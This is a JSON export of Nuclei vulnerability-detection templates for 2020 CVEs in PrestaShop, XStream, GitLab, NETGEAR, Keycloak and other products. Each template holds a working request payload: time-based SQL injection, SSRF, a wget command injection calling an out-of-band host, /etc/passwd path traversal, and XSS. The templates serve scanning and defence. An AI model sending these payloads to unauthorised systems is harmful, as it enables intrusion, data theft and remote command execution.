4b0a00483046022100833148b184c9a024daabe14d4fef1a74835dd8f418140ce52d04df763175d9e8022100f65031aa40e1c23f6150f38f0f8737a2ac23a8e5c5f4cc29f48a0de92a01de3c:922c64590222798bb761d5b6d8e72950", "hash": "d445ddea199abc7899454b32ee4a068b", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e8" }, "name": "CVE-2020-26248.yaml", "content": "id: CVE-2020-26248\n\ninfo:\n name: PrestaShop Product Comments <4.2.0 - SQL Injection\n author: edoardottt\n severity: high\n description: |\n PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in 4.2.1.\n reference:\n - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html\n - https://packagist.org/packages/prestashop/productcomments\n - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26248\n - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H\n cvss-score: 8.2\n cve-id: CVE-2020-26248\n cwe-id: CWE-89\n epss-score: 0.01617\n epss-percentile: 0.87187\n cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: prestashop\n product: productcomments\n framework: prestashop\n tags: cve,cve2020,packetstorm,sqli,prestshop,prestashop\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET 
/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"average_grade\")'\n condition: and\n# digest: 4b0a00483046022100bfb60507528a715a3186e6f06262c9534c16003bc96c3baa4049108a3d06d67a0221008662896abf6d4938c136f30d2492fc638fb1157aea901a3875741b3251869743:922c64590222798bb761d5b6d8e72950", "hash": "5b134b48636a3791fcf2bae14f0ce363", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081e9" }, "name": "CVE-2020-26258.yaml", "content": "id: CVE-2020-26258\n\ninfo:\n name: XStream <1.4.15 - Server-Side Request Forgery\n author: pwnhxl\n severity: high\n description: |\n XStream before 1.4.15 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to data leakage or further attacks.\n remediation: Install at least 1.4.15 if you rely on XStream's default blacklist of the Security Framework, and at least Java 15 or higher.\n reference:\n - https://x-stream.github.io/CVE-2020-26258.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258\n - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26258\n - https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 7.7\n cve-id: CVE-2020-26258\n cwe-id: 
CWE-918\n epss-score: 0.90088\n epss-percentile: 0.98718\n cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: xstream_project\n product: xstream\n tags: cve,cve2020,xstream,ssrf,oast,xstream_project\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n\n \n \n \n 0\n \n \n \n http://{{interactsh-url}}/internal/:\n \n \n \n 0\n \n \n test\n \n \n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Java\"\n# digest: 4a0a0047304502210090b286f58ae4ddf71281f47e94a6932952a067406a9d9bd4978cee28462a401b02207bc498dd31d9e55e2a847a6900d2537b77406a0208b97997e752e77bbc887dfe:922c64590222798bb761d5b6d8e72950", "hash": "94a89846e9070bb2dff170be4e32e622", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ea" }, "name": "CVE-2020-26413.yaml", "content": "id: CVE-2020-26413\n\ninfo:\n name: Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure\n author: _0xf4n9x_,pikpikcu\n severity: medium\n description: GitLab CE and EE 13.4 through 13.6.2 is susceptible to Information disclosure via GraphQL. User email is visible. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can gain unauthorized access to sensitive information.\n remediation: |\n Upgrade Gitlab CE/EE to version 13.6.3 or later.\n reference:\n - https://gitlab.com/gitlab-org/gitlab/-/issues/244275\n - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26413\n - https://hackerone.com/reports/972355\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-26413\n cwe-id: CWE-200\n epss-score: 0.74714\n epss-percentile: 0.97878\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve,cve2020,hackerone,gitlab,exposure,enum,graphql\n\nhttp:\n - raw:\n - |\n POST /api/graphql HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"query\": \"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\n \"variables\": null,\n \"operationName\": null\n }\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"username\":'\n - '\"avatarUrl\":'\n - '\"node\":'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: json\n json:\n - '.data.users.edges[].node.email'\n part: body\n# digest: 490a0046304402207563b8edc19efc3cc19d14fdb717c94e8c29de7443af2fdb01addacf38917ef7022035b462d59175b05bc03b8666aa7cab3aebb000b9c0e22dec14d0dc05b0dfe876:922c64590222798bb761d5b6d8e72950", "hash": "d54cac6d0f6173edb0c9ba0be926b669", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081eb" }, "name": "CVE-2020-26876.yaml", "content": "id: 
CVE-2020-26876\n\ninfo:\n name: WordPress WP Courses Plugin Information Disclosure\n author: dwisiswant0\n severity: high\n description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin.\n remediation: |\n Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26876\n - https://www.exploit-db.com/exploits/48910\n - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/\n - https://plugins.trac.wordpress.org/changeset/2388997\n - https://plugins.trac.wordpress.org/changeset/2389243\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-26876\n cwe-id: CWE-306\n epss-score: 0.01988\n epss-percentile: 0.8756\n cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpcoursesplugin\n product: wp-courses\n framework: wordpress\n tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/lesson/1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"rest_post_invalid_id\"\n - \"\\\"(guid|title|content|excerpt)\\\":{\\\"rendered\\\":\"\n condition: or\n\n - type: status\n status:\n - 200\n - 404\n condition: or\n# digest: 4a0a00473045022100bac7ab1c102483005544a8092e8ebf09e74b5e8e497a2619f0aa05b7e4d877640220469c403326592d174fb4d0dc48c2bbba4aba553242fd2ba06bbcf788c29951f6:922c64590222798bb761d5b6d8e72950", "hash": "b1dfa0a8d71de5eb1e8ffdd834614ec3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf3081ec" }, "name": "CVE-2020-26919.yaml", "content": "id: CVE-2020-26919\n\ninfo:\n name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution\n author: gy741\n severity: critical\n description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/\n - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26919\n - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-26919\n epss-score: 0.97285\n epss-percentile: 0.99849\n cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: jgs516pe_firmware\n tags: cve,cve2020,netgear,rce,oast,router,unauth,kev\n\nhttp:\n - raw:\n - |\n POST /login.htm HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP 
Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100d2e91cf5797e148b54ee16ff4a7527477ceef3ac4051306dd1a029f075032ff70221009edba962cee52737ac2d8f232b2701ea2f789aefa1b7c4a87beb542aeec67bb3:922c64590222798bb761d5b6d8e72950", "hash": "fe79daefb3fbf6a55c69f272267828fb", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ed" }, "name": "CVE-2020-26948.yaml", "content": "id: CVE-2020-26948\n\ninfo:\n name: Emby Server Server-Side Request Forgery\n author: dwisiswant0\n severity: critical\n description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.\n impact: |\n An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of Emby Server.\n reference:\n - https://github.com/btnz-k/emby_ssrf\n - https://nvd.nist.gov/vuln/detail/CVE-2020-26948\n - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Live-Hack-CVE/CVE-2020-26948\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-26948\n cwe-id: CWE-918\n epss-score: 0.1449\n epss-percentile: 0.95606\n cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: emby\n product: emby\n tags: cve2020,cve,emby,jellyfin,ssrf\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Name or service not known\"\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 500\n# digest: 
4b0a00483046022100c5b4229b7c0844e8fcfb9bc1679051e3ac701c065fd3e5789469152a7df1ec21022100980de112b617f6c799be1d61a0dd773d11dfc361c3d2bd02d98dae82ac6e8d47:922c64590222798bb761d5b6d8e72950", "hash": "2b96d428602111a14fae217001419d53", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ee" }, "name": "CVE-2020-27191.yaml", "content": "id: CVE-2020-27191\n\ninfo:\n name: LionWiki <3.2.12 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.\n remediation: |\n Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.\n reference:\n - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi\n - http://lionwiki.0o.cz/index.php?page=Main+page\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27191\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27191\n cwe-id: CWE-22\n epss-score: 0.01572\n epss-percentile: 0.86986\n cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lionwiki\n product: lionwiki\n tags: cve2020,cve,lionwiki,lfi,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\\\.//./\\\\.//./\\\\.//./\\\\.//./\\\\.//./etc/passwd&restore=1\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 480a00453043022024fd9eabd5990697a1c0d513e268964dba7e4032104e676f2c1516f0d7bf1e6c021f01979b841bd595af2324f5a4beea443729213ab4e816a2f27b4f681dfe71ac:922c64590222798bb761d5b6d8e72950", "hash": 
"674473cba764c4dab79467cb7ae799e5", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081ef" }, "name": "CVE-2020-2733.yaml", "content": "id: CVE-2020-2733\n\ninfo:\n name: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure\n author: DhiyaneshDk,pussycat0x\n severity: critical\n description: |\n JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://redrays.io/cve-2020-2733-jd-edwards/\n - https://www.oracle.com/security-alerts/cpuapr2020.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-2733\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-2733\n epss-score: 0.29301\n epss-percentile: 0.96779\n cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: jd_edwards_enterpriseone_tools\n shodan-query: port:8999 product:\"Oracle WebLogic Server\"\n tags: cve2020,cve,oracle,weblogic,disclosure,exposure\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/manage/fileDownloader?sec=1'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ACHCJK'\n\n - type: word\n part: header\n words:\n - \"text/plain\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502202fa8f3f605bced9c2bff8bd71dfd1b657c7806b31db0da37ba79f848736c0448022100b028c9c54f50d73729aa0630e94a3a90f88663ee769dae3762ef6b64d4da2dd0:922c64590222798bb761d5b6d8e72950", "hash": "7c7e9b09252c12448251458633c15049", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f0" }, "name": "CVE-2020-27361.yaml", "content": "id: CVE-2020-27361\n\ninfo:\n name: Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure\n author: gy741\n severity: high\n description: Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Akkadian Provisioning Manager to fix the vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27191\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27361\n cwe-id: CWE-668\n epss-score: 0.0314\n epss-percentile: 0.90098\n cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: akkadianlabs\n product: akkadian_provisioning_manager\n tags: cve,cve2020,akkadian,listing,exposure,akkadianlabs\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pme/media/\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Index of /pme/media\"\n - \"Parent Directory\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210094fff2188339af554a474a738ff3f251d4a53c536e71f4721382505f0d6ba8db0220423fcb2526fa835902d21390aba7a4b75a61a03cf26b7e9af708346a2dddbeea:922c64590222798bb761d5b6d8e72950", "hash": "781c58bc4467b44a210390a6bf7e00f6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f1" }, "name": "CVE-2020-27467.yaml", 
"content": "id: CVE-2020-27467\n\ninfo:\n name: Processwire CMS <2.7.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n remediation: |\n Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability.\n reference:\n - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire\n - https://processwire.com/\n - https://github.com/ceng-yildirim/LFI-processwire\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27467\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-27467\n cwe-id: CWE-22\n epss-score: 0.01056\n epss-percentile: 0.83739\n cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: processwire\n product: processwire\n tags: cve,cve2020,processwire,lfi,cms,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?download=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022005cc8cc6d259f90bddcc4ab74577e25407c52171a5893d763b5d5ab1dd6159c602204a99b859d07b48c2f47cf2a1a8329315e236c3999217ea353e49076587c74df0:922c64590222798bb761d5b6d8e72950", "hash": "defcd42c9729dc39e95b77e355e05035", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f2" }, "name": "CVE-2020-27481.yaml", "content": "id: CVE-2020-27481\n\ninfo:\n name: Good Layers LMS Plugin <= 2.1.4 - SQL Injection\n author: edoardottt\n severity: critical\n description: |\n An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin <= 
2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version of the Good Layers LMS Plugin (2.1.5 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/652eaef8-5a3c-4a2d-ac60-b5414565c397\n - https://gist.github.com/0xx7/a7aaa8b0515139cf7e30c808c8d54070\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27481\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-27481\n cwe-id: CWE-89\n epss-score: 0.12857\n epss-percentile: 0.94961\n cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: goodlayers\n product: good_learning_management_system\n framework: wordpress\n tags: cve,cve2020,goodlayerslms,sqli,wpscan,goodlayers,wordpress\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n\n matchers:\n - type: dsl\n dsl:\n - \"duration>=6\"\n - \"status_code == 200\"\n - \"contains(body, 'goodlayers-lms') || contains(body, 'goodlms')\"\n condition: and\n# digest: 4a0a00473045022100838e205274d6592ebebcc4ab9b689fd6d05ec245b61cb0f69cff831152ea32dd02203fc10829d7d36c26e62df66914a28f76aea1fb34c5f7162abe66805dbf74f212:922c64590222798bb761d5b6d8e72950", "hash": "2419f77e0c7e0bbb59ac18b62eaea5f4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f3" }, "name": 
"CVE-2020-27735.yaml", "content": "id: CVE-2020-27735\n\ninfo:\n name: Wing FTP 6.4.4 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability.\n reference:\n - https://www.wftpserver.com/serverhistory.htm\n - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27735\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-27735\n cwe-id: CWE-79\n epss-score: 0.00228\n epss-percentile: 0.60318\n cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wftpserver\n product: wing_ftp_server\n tags: cve,cve2020,xss,wing-ftp,wftpserver\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a494d928ecfd0bcd8f5ad8d80b1ea8390fed72aca1ab771e8e49b09004d6c4fc022100f5d799e1f6995828b9abf133313b998de24a8ae77af0cf98077f0656f7d36bef:922c64590222798bb761d5b6d8e72950", "hash": "f43968ae6d86ef41d86c08e3728d28c1", "level": 
4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f4" }, "name": "CVE-2020-27838.yaml", "content": "id: CVE-2020-27838\n\ninfo:\n name: KeyCloak - Information Exposure\n author: mchklt\n severity: medium\n description: |\n A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.\n impact: |\n The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.\n remediation: |\n Apply the latest security patches or updates provided by the KeyCloak vendor.\n reference:\n - https://bugzilla.redhat.com/show_bug.cgi?id=1906797\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27838\n - https://github.com/muneebaashiq/MBProjects\n - https://github.com/j4k0m/godkiller\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-27838\n cwe-id: CWE-287\n epss-score: 0.08135\n epss-percentile: 0.93734\n cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redhat\n product: keycloak\n shodan-query: \"title:\\\"keycloak\\\"\"\n tags: cve,cve2020,keycloak,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"clientId\":\"security-admin-console\"'\n - '\"secret\":'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950", "hash": 
"a426135003b0719cd778bda922f41fb1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3081f5" }, "name": "CVE-2020-27866.yaml", "content": "id: CVE-2020-27866\n\ninfo:\n name: NETGEAR - Authentication Bypass\n author: gy741\n severity: high\n description: NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability.\n reference:\n - https://wzt.ac.cn/2021/01/13/AC2400_vuln/\n - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866\n - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers\n - https://nvd.nist.gov/vuln/detail/CVE-2020-27866\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-27866\n cwe-id: CWE-288,CWE-287\n epss-score: 0.00363\n epss-percentile: 0.69495\n cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: ac2100_firmware\n tags: cve,cve2020,netgear,auth-bypass\n\nhttp:\n - raw:\n - |\n GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n Accept-Language: en\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Debug Enable!'\n\n - type: status\n status:\n - 200\n# digest: 
